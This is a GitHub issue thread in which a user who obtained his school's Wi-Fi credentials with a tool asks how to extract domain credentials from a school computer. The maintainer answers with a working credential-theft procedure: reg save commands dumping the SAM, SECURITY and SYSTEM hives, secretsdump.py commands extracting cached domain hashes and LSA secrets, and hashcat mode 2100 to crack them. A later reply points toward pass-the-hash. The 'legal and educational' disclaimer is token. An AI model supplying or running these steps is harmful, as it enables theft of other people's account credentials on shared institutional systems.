-
Notifications
You must be signed in to change notification settings - Fork 22
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Gets credentials but with a ethernet conection #16
Comments
Hi,
(I'll assume this is legal and for educational purposes, etc, etc)
*The older the version of windows, the better your chances of success.*
You're getting into the realm of pen testing now.
Domain credentials are stored in SAM / SECURITY/ SYSTEM files.
You can dump those files with an elevated command prompt:
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
Copy those files off the PC, those contain the cached domain credentials,
you'll need to extract them and then crack them.
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system
'/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save'
-system '/path/to/system.save' LOCAL
Secrets dump script:
https://github.com/fortra/impacket/blob/master/examples/secretsdump.py
You're looking for something like
$DCC2$10240#user#_hash_here
In the LSA secrets, the same secrets will be local account hashes.
You want to crack the hash with mode 2100 with hashcat:
https://hashcat.net/wiki/doku.php?id=example_hashes
There's enough info here to Google the rest.
Best of luck with your legal and educational projects.
…On Thu, 23 Nov 2023, 12:23 am Ardumine, ***@***.***> wrote:
Hi! First of all, I'm really happy for this project to exist! I was able
to use this in my laptop and i got the school Wi-Fi auth with no problem!
But there is just one thing. How can i use this instead of a Wi-Fi
connection, with an ethernet connection? What I'm trying to say is that
this program gets the credentials from the Wi-Fi saved on the laptop, but i
need it to get the credentials on an ethernet connection, in this case a
school computer where i have Admin access. Is this possible?
Thanks, and sorry for my bad English :)
—
Reply to this email directly, view it on GitHub
<#16>, or
unsubscribe
<https://github.com/notifications/unsubscribe-auth/AA4UUDXMMY2BLMBRII5HQRTYFX4EDAVCNFSM6AAAAAA7WHNOPSVHI2DSMVQWIX3LMV43ASLTON2WKOZSGAYDMMZTGQ2TOOA>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
Hi! Sorry for late response! After having the $DCC2$10240#user#_hash_here, can I import it directly to my computer without cracking the hash? Btw, thanks for the response! |
I don't recall what kind of hash that is so I can't comment on it, but
yeah, what you're asking about is similar to "pass the hash", and depending
on what kind of hash it is, you can for sure just load it into your
computer.
I'm not sure what kind of hash this is though anymore.
…On Fri, 1 Mar 2024, 10:28 pm Ardumine, ***@***.***> wrote:
Hi! Sorry for late response! After having the $DCC2$10240#user#_hash_here,
can I import it directly to my computer without cracking the hash? Btw,
thanks for the response!
—
Reply to this email directly, view it on GitHub
<#16 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AA4UUDWNRLKAVALLVPJ7QUDYWBQ5FAVCNFSM6AAAAAA7WHNOPSVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTSNZTGAYTQNJZHE>
.
You are receiving this because you commented.Message ID:
***@***.***>
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi! First of all, I'm really happy for this project to exist! I was able to use this in my laptop and i got the school Wi-Fi auth with no problem! But there is just one thing. How can i use this instead of a Wi-Fi connection, with an ethernet connection? What I'm trying to say is that this program gets the credentials from the Wi-Fi saved on the laptop, but i need it to get the credentials on an ethernet connection, in this case a school computer where i have Admin access. Is this possible?
Thanks, and sorry for my bad English :)
The text was updated successfully, but these errors were encountered: